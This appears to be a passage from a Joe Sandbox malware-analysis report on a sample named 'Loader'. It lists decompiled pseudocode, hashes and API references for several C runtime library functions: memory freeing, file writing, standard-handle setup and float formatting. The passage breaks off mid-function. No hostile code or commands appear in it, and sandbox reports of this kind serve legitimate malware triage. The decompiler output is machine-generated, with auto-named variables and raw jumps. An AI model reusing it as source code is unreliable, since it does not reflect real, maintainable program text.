Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID:
API String ID: 910155933-0
Opcode ID: c03d49c1db10999f3efa9914c2e3a5a273efbacddd14d4b2f7f5716fc6e805f7
Instruction ID: 32f7b235ee49ffd5c49069c29986e1c0b19a7d9d3e5dca0f79996f9239a4c93d
Opcode Fuzzy Hash: c03d49c1db10999f3efa9914c2e3a5a273efbacddd14d4b2f7f5716fc6e805f7
Instruction Fuzzy Hash: 0E51F272A0024DABDF219BE5CD45BFEBBB9EF45350F240055F600A7152DB789A41C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AEE8FD Relevance: 4.6, APIs: 3, Instructions: 141
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00AEE8FD(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				char _t116;
				void* _t120;
				void* _t121;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E00AF4840(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E00AF7359(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E00AF548F(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E00AF7359(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
										E00AF4AEF( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0xb36e28; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
											E00AF4AEF( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0x4c488b00
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E00AF4AEF(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E00AED26C();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E00AF709A( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E00AF4A92(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E00AF4AEF(_t163);
										return _t160;
									} else {
										_t110 = E00AF709A(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t160 = E00AF2924(_t125, _t145, _t153, _t160, _t163, _v0, _t163);
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E00AED26C();
										asm("int3");
										_push(_t167);
										E00AF6D7F();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E00AEE8A2(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								_t121 = E00AF2924(_t125, _t131, _t153, _t157, _t163, _v0, 0); // executed
								return _t121;
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x00aee8fd
0x00aee905
0x00aee906
0x00aee907
0x00aee909
0x00aee90d
0x00aee90f
0x00aee911
0x00aee913
0x00aee918
0x00aee91b
0x00aee91e
0x00aee963
0x00aee963
0x00000000
0x00aee920
0x00aee920
0x00aee925
0x00aee928
0x00aee92d
0x00aee930
0x00aee93d
0x00aee942
0x00aee945
0x00aee94a
0x00aee94f
0x00aee976
0x00aee979
0x00aee97b
0x00000000
0x00aee97d
0x00aee97d
0x00aee987
0x00aee98d
0x00aee992
0x00aee995
0x00aee997
0x00aee9b6
0x00aee9b9
0x00aee9c0
0x00aee9c4
0x00aee9c6
0x00aee9ca
0x00aee9ce
0x00aee9d6
0x00aee9da
0x00aee9e1
0x00aee9e6
0x00aee9eb
0x00aee9eb
0x00aee9eb
0x00aee9ce
0x00aee9ee
0x00aee9f1
0x00aee9f6
0x00aee9fc
0x00aeea04
0x00aeea08
0x00aeea0a
0x00aeea0c
0x00aeea10
0x00aeea11
0x00aeea19
0x00aeea1d
0x00aeea27
0x00aeea29
0x00aeea29
0x00aeea29
0x00aeea29
0x00aeea11
0x00aeea0a
0x00aeea2e
0x00aeea31
0x00aeea31
0x00aeea34
0x00aeea3c
0x00aeea46
0x00aee965
0x00aee969
0x00aee999
0x00aee999
0x00aee99c
0x00aeea4f
0x00aeea4f
0x00aeea4f
0x00000000
0x00aee9a2
0x00aee9a2
0x00aee9a5
0x00000000
0x00aee9ab
0x00aee9ac
0x00000000
0x00aee9b1
0x00aee9a5
0x00aee99c
0x00aee997
0x00aee951
0x00aee954
0x00aeea51
0x00aeea51
0x00aeea52
0x00aeea53
0x00aeea54
0x00aeea55
0x00aeea56
0x00aeea5b
0x00aeea5f
0x00aeea61
0x00aeea62
0x00aeea66
0x00aeea76
0x00aeea77
0x00aeea80
0x00aeea88
0x00aeea8d
0x00aeea90
0x00aeea92
0x00aeea9e
0x00aeeaa8
0x00aeeaab
0x00aeeaac
0x00aeeaae
0x00aeeadf
0x00aeeae0
0x00aeeaeb
0x00aeeab0
0x00aeeaba
0x00aeeabf
0x00aeeac2
0x00aeeac4
0x00aeeadd
0x00000000
0x00aeeac6
0x00aeeac6
0x00aeeac9
0x00000000
0x00aeeacb
0x00aeeacb
0x00aeeace
0x00000000
0x00aeead0
0x00000000
0x00aeead0
0x00aeeace
0x00aeeac9
0x00aeeac4
0x00aeea94
0x00aeea94
0x00aeea97
0x00aeeaec
0x00aeeaec
0x00aeeaed
0x00aeeaee
0x00aeeaef
0x00aeeaf0
0x00aeeaf1
0x00aeeaf6
0x00aeeaf9
0x00aeeaff
0x00aeeb07
0x00aeeb12
0x00aeeb15
0x00aeeb16
0x00aeeb19
0x00aeeb1f
0x00aeeb23
0x00aeeb27
0x00aeeb28
0x00aeeb2e
0x00aeea99
0x00aeea99
0x00aeea9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00aeea9c
0x00aeea97
0x00aeea68
0x00aeea6d
0x00aeea75
0x00aeea75
0x00000000
0x00000000
0x00000000
0x00aee954
0x00aee94f

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

_free.LIBCMT ref: 00AEE9AC
_free.LIBCMT ref: 00AEE9DA
_free.LIBCMT ref: 00AEEA1D

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: add0d539405711ff5f8dcae8b237bee025a030c58da453a9a0efacf69562606e
Instruction ID: 36187512024457639189b23d67249b7d2eaff1956e02261292c6af1c08669127
Opcode Fuzzy Hash: add0d539405711ff5f8dcae8b237bee025a030c58da453a9a0efacf69562606e
Instruction Fuzzy Hash: 8E418A31600106AFD764DFADC881A7AB3E9FF48351B24066DF555D7292EB31EC10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AEEA5C Relevance: 4.6, APIs: 3, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00AEEA5C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				char _t30;
				void* _t34;
				void* _t35;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_t36 = __ebx;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E00AF709A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E00AF4A92(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E00AF4AEF(_t50);
							return _t48;
						} else {
							_t24 = E00AF709A(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t48 = E00AF2924(_t36, _t39, _t46, _t48, _t50, _a4, _t50);
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E00AED26C();
							asm("int3");
							E00AF6D7F();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E00AEE8A2(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t35 = E00AF2924(__ebx, __ecx, _t46, __edi, __esi, _a4, 0); // executed
					return _t35;
				}
			}

0x00aeea5c
0x00aeea5c
0x00aeea61
0x00aeea66
0x00aeea76
0x00aeea77
0x00aeea80
0x00aeea88
0x00aeea8d
0x00aeea90
0x00aeea92
0x00aeea9e
0x00aeeaa8
0x00aeeaab
0x00aeeaac
0x00aeeaae
0x00aeeadf
0x00aeeae0
0x00aeeaeb
0x00aeeab0
0x00aeeaba
0x00aeeabf
0x00aeeac2
0x00aeeac4
0x00aeeadd
0x00000000
0x00aeeac6
0x00aeeac6
0x00aeeac9
0x00000000
0x00aeeacb
0x00aeeacb
0x00aeeace
0x00000000
0x00aeead0
0x00000000
0x00aeead0
0x00aeeace
0x00aeeac9
0x00aeeac4
0x00aeea94
0x00aeea94
0x00aeea97
0x00aeeaec
0x00aeeaec
0x00aeeaed
0x00aeeaee
0x00aeeaef
0x00aeeaf0
0x00aeeaf1
0x00aeeaf6
0x00aeeaff
0x00aeeb07
0x00aeeb12
0x00aeeb15
0x00aeeb16
0x00aeeb19
0x00aeeb1f
0x00aeeb23
0x00aeeb27
0x00aeeb28
0x00aeeb2e
0x00aeea99
0x00aeea99
0x00aeea9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00aeea9c
0x00aeea97
0x00aeea68
0x00aeea6d
0x00aeea75
0x00aeea75

APIs

__cftoe.LIBCMT ref: 00AEEA88
__cftoe.LIBCMT ref: 00AEEABA
_free.LIBCMT ref: 00AEEAE0

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: d69744f13b9ef1781ec012e58504a3145aaf57e094a8d339f0b7103fcd66096d
Instruction ID: c14e5a43c4f3301ba8c3ac5f3a017119fb08218167beae428d968a48ba408db2
Opcode Fuzzy Hash: d69744f13b9ef1781ec012e58504a3145aaf57e094a8d339f0b7103fcd66096d
Instruction Fuzzy Hash: F821D6728041487ACF24EBA69C46EEF3BB9EF853A4F20413AF915D7191EE30DE40C661

Uniqueness

Uniqueness Score: -1.00%

Function 00AF8393 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00AF8393(void* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				long _v5132;
				intOrPtr _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t41;
				long _t43;
				char _t44;
				void* _t46;
				intOrPtr* _t50;
				intOrPtr _t54;
				void* _t55;
				long _t56;
				char* _t57;
				signed int _t58;

				E00AE9E60(0x140c);
				_t29 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t29 ^ _t58;
				_t47 = _a8;
				_t46 = _a4;
				_t55 = _t46;
				_t50 = _a12;
				_t54 = _a16 + _t50;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0xb38530 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5136 = _t54;
				asm("stosd");
				asm("stosd");
				if(_t50 < _t54) {
					_t55 = _v5132;
					do {
						_t57 =  &_v5128;
						while(_t50 < _t54) {
							_t44 =  *_t50;
							_t50 = _t50 + 1;
							if(_t44 == 0xa) {
								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
								 *_t57 = 0xd;
								_t57 = _t57 + 1;
							}
							 *_t57 = _t44;
							_t57 = _t57 + 1;
							if(_t57 <  &_v9) {
								continue;
							}
							break;
						}
						_a12 = _t50;
						_t56 = _t57 -  &_v5128;
						_t41 = WriteFile(_t55,  &_v5128, _t56,  &_v5132, 0); // executed
						if(_t41 == 0) {
							 *_t46 = GetLastError();
						} else {
							_t43 = _v5132;
							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
							if(_t43 >= _t56) {
								goto L9;
							}
						}
						goto L12;
						L9:
						_t50 = _a12;
						_t54 = _v5136;
					} while (_t50 < _t54);
				}
				L12:
				return E00AE95ED(_t46, _t46, _v8 ^ _t58, _t54, _t55, _t56);
			}

0x00af839d
0x00af83a2
0x00af83a9
0x00af83ac
0x00af83be
0x00af83ca
0x00af83d0
0x00af83d3
0x00af83d5
0x00af83dd
0x00af83de
0x00af83e4
0x00af83e5
0x00af83e8
0x00af83ea
0x00af83f0
0x00af83f0
0x00af83f6
0x00af83fa
0x00af83fc
0x00af83ff
0x00af8401
0x00af8404
0x00af8407
0x00af8407
0x00af8408
0x00af840a
0x00af8410
0x00000000
0x00000000
0x00000000
0x00af8410
0x00af8418
0x00af841b
0x00af842f
0x00af8437
0x00af845b
0x00af8439
0x00af8439
0x00af843f
0x00af8444
0x00000000
0x00000000
0x00af8444
0x00000000
0x00af8446
0x00af8446
0x00af8449
0x00af844f
0x00af8453
0x00af845d
0x00af846d

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,?,00AF88A6,?,00000000,?,?,00000000,00000000), ref: 00AF842F
GetLastError.KERNEL32(?,00AF88A6,?,00000000,?,?,00000000,00000000,00000000,?,00B12F58,00000010,00AF02B3,00000000,00000000,00000000), ref: 00AF8455

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 56ad21ebd2b8ee428c5e032d08606bb5606ec401873d7aa497ed8f0ead002753
Instruction ID: 6209ec32aaa81bdf67ba8be0dd51159a1ae51283211d4b5768223ac247c5edd7
Opcode Fuzzy Hash: 56ad21ebd2b8ee428c5e032d08606bb5606ec401873d7aa497ed8f0ead002753
Instruction Fuzzy Hash: 6B218231A002199BCF19CF5ADC80AEEB7B9EF49301F1445A9EA46D7211DA309D42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00AF653A Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00AF653A() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0xb38530 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0xb383a0; // 0x7d90d8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x00af653f
0x00af6541
0x00af6545
0x00af654e
0x00af6559
0x00af6569
0x00af656d
0x00af6570
0x00af6582
0x00af6572
0x00af6575
0x00af657e
0x00af6577
0x00af657a
0x00af657a
0x00af6575
0x00af6584
0x00af658c
0x00af6591
0x00af65a0
0x00af6597
0x00af6598
0x00af6598
0x00af65a4
0x00af65c2
0x00af65c6
0x00af65cd
0x00af65d4
0x00af65d6
0x00af65d9
0x00af65d9
0x00af65a6
0x00af65a6
0x00af65a9
0x00af65af
0x00af65ba
0x00af65bc
0x00af65bc
0x00af65b1
0x00af65b1
0x00af65b1
0x00af65af
0x00af6561
0x00af6561
0x00af6561
0x00af65e0
0x00af65e1
0x00af65ed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AF6586
GetFileType.KERNELBASE(00000000), ref: 00AF6598

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6559a182f1bf9ac83bfa7fa58dc76355dbb41fcd8165338956253d40c8aa3fee
Instruction ID: b7b93c0b8c7e44beb1b7d3666ce27b2fb1f224c86ca7f0f23ac9752fae73025f
Opcode Fuzzy Hash: 6559a182f1bf9ac83bfa7fa58dc76355dbb41fcd8165338956253d40c8aa3fee
Instruction Fuzzy Hash: 3C1129711047058ACB304FBE8C88636BAA4AB66370B38071AF6B7E35F5D730D985D240

Uniqueness

Uniqueness Score: -1.00%

Function 00AF18CF Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00AF18CF(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0xb384c0 == 0) {
					_push(_t13);
					E00AFC85A(__ebx); // executed
					_t2 = E00AFCB4E(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E00AF1922(__ebx, _t17);
						if(_t3 != 0) {
							 *0xb384cc = _t3;
							_t14 = 0;
							 *0xb384c0 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E00AF4AEF(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E00AF4AEF(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x00af18d6
0x00af18dc
0x00af18dd
0x00af18e2
0x00af18e7
0x00af18eb
0x00af18f3
0x00af18fb
0x00af1902
0x00af1907
0x00af1909
0x00af18fd
0x00af18fd
0x00af18fd
0x00af1910
0x00af18ed
0x00af18ed
0x00af18ed
0x00af1917
0x00af1921
0x00af18d8
0x00af18da
0x00af18da

APIs

_free.LIBCMT ref: 00AF1917

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7640fce527d7b86fb716ab71430f2c29599d5157aa3a0fe29b4f59624eb74079
Instruction ID: 0912106cc0a2048bb97670fe2cbd335786bb880968352c5855f69f97929255a8
Opcode Fuzzy Hash: 7640fce527d7b86fb716ab71430f2c29599d5157aa3a0fe29b4f59624eb74079
Instruction Fuzzy Hash: 67E0E53250261DA1D2216BFBAD0227A1665EF813B1B21031AF634871D1DFA08C4151D2

Uniqueness

Uniqueness Score: -1.00%

Function 00AE8235 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00AE8235(void* __ecx, signed int __edx, void* __esi, signed int _a4) {
				signed int _v8;
				char _v40;
				char _v43;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				signed int _t32;
				signed int _t34;
				signed int _t38;
				signed int _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t67;
				void* _t68;
				signed int _t72;
				void* _t73;
				signed int* _t74;
				signed int _t75;

				_t69 = __esi;
				_t67 = __edx;
				_t32 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t32 ^ _t75;
				_t54 = _a4;
				_t68 = __ecx;
				if(_t54 != 0xffffffff) {
					_t34 =  *(__ecx + 0x20);
					_push(__esi);
					_t56 =  *_t34;
					__eflags = _t56;
					if(_t56 == 0) {
						L5:
						__eflags =  *(_t68 + 0x4c);
						if( *(_t68 + 0x4c) == 0) {
							L18:
